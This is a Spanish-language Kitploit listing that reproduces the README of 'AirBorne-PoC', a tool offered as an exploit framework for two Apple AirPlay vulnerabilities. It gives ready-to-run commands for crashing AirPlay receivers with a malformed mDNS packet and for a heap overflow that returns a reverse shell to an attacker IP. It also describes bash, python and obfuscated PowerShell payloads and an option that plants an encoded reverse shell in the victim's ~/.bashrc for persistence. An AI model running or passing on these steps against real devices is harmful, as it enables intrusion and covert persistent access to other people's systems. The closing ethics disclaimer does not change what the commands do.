Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
AirBorne-PoC — PoC para CVE-2025-24252 y CVE-2025-24132 | Kitploit
Herramientas/GitHubGitHub/ekomssavior/airborne-poc
Mecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónShellcodePost-ExplotaciónComando y ControlHerramienta de Acceso RemotoDesarrollo de PayloadsExplotación de Binarios
GitHubekomssavior/airborne-poc

AirBorne-PoC

PoC para CVE-2025-24252 y CVE-2025-24132

1642743hace 8 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
Compartir

AirBorne PoC Framework – Edición Elite RCE

Framework PoC completo para CVE-2025-24252 y CVE-2025-24132
Por ekomsSavior |

AirBorne es un framework combinado de prueba de concepto (PoC) que apunta a dos vulnerabilidades graves en el servicio AirPlay de Apple. Incluye un desencadenador de caída completo y un exploit de shell inversa funcional con persistencia opcional, listener y múltiples formatos de payload, todo en un solo script.

¿Buscas la versión original?
La edición heredada sigue disponible en la rama legacy de este repositorio.
Para revisarla:

root@kitploit:~
git checkout legacy

CVEs Cubiertos

CVE-2025-24252 – Caída por registro TXT de mDNS

  • Desencadena una caída en el daemon de AirPlayReceiver mediante un paquete mDNS malformado.
  • Funciona mediante difusión UDP en el puerto 5353.

CVE-2025-24132 – Desbordamiento de montículo → Shell inversa (RCE)

  • Desencadena un desbordamiento de montículo en el servicio TCP de AirPlay en el puerto 7000.
Descargar herramienta
  • Compatible con payloads de shell inversa en bash, python y PowerShell.
  • Incluye persistencia opcional mediante inyección en .bashrc (Linux).

  • Primeros Pasos

    1. Clonar el Repositorio

    root@kitploit:~
    git clone https://github.com/ekomsSavior/AirBorne-PoC.git
    cd AirBorne-PoC
    

    2. Instalar Dependencias

    root@kitploit:~
    sudo apt update
    sudo apt install -y python3-scapy netcat
    

    Recorrido de Ejecución

    El único script airborne.py incluye ambos PoCs y toda la lógica:

    • Selecciona un CVE usando --exploit
    • Configura un payload de shell inversa usando --payload
    • Inicia automáticamente un listener de netcat por ti
    • Habilita opcionalmente la persistencia en el objetivo usando --persistent

    Ejemplos de Uso

    Provocar Caída del Objetivo con Paquete mDNS (CVE-2025-24252)

    root@kitploit:~
    sudo python3 airborne.py --exploit 24252 --interface wlan0
    

    Requiere una interfaz en modo monitor.


    Lanzar Desbordamiento de Montículo → RCE (CVE-2025-24132)

    Iniciar el exploit completo con shell bash predeterminada:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
    

    Elegir shell de Python en su lugar:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
    

    Habilitar persistencia real en objetivos Linux:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
    

    Solo inyección de comandos de shell

    root@kitploit:~
    sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
    

    Opciones de Payload

    PayloadDescripción
    bashShell inversa bash predeterminada sobre TCP
    pythonShell inversa basada en Python usando socket y pty
    powershellPayload RCE completo de Windows PowerShell (ofuscado)

    Modo de Persistencia

    Al usar --persistent, el script añadirá el payload de shell inversa codificado al archivo del objetivo:

    root@kitploit:~
    ~/.bashrc
    

    Esto garantiza que recibirás una shell cada vez que el usuario inicie sesión o se abra una terminal.


    Notas de Mantenimiento

    • Las shells inversas se codifican usando base64 y se entregan tras el desbordamiento de búfer
    • Todos los payloads se envían a través del puerto 7000
    • Los paquetes mDNS viajan por UDP 5353 y requieren permisos de socket sin procesar
    • Asegúrate de que la IP de tu equipo de ataque sea alcanzable por el dispositivo objetivo
    • El script maneja casos de error básicos y falla silenciosamente si los puertos están cerrados

    Aviso Ético

    Este proyecto está destinado únicamente a investigación educativa, ética y autorizada.

    • Debes tener permiso explícito para probar el sistema objetivo.
    • Asumes toda la responsabilidad por cualquier acción realizada.

    La explotación no autorizada de sistemas es ilegal y poco ética.


    Créditos

    • Creado por ekomsSavior
    • Inspirado en CVEs reales e investigación de desarrollo de exploits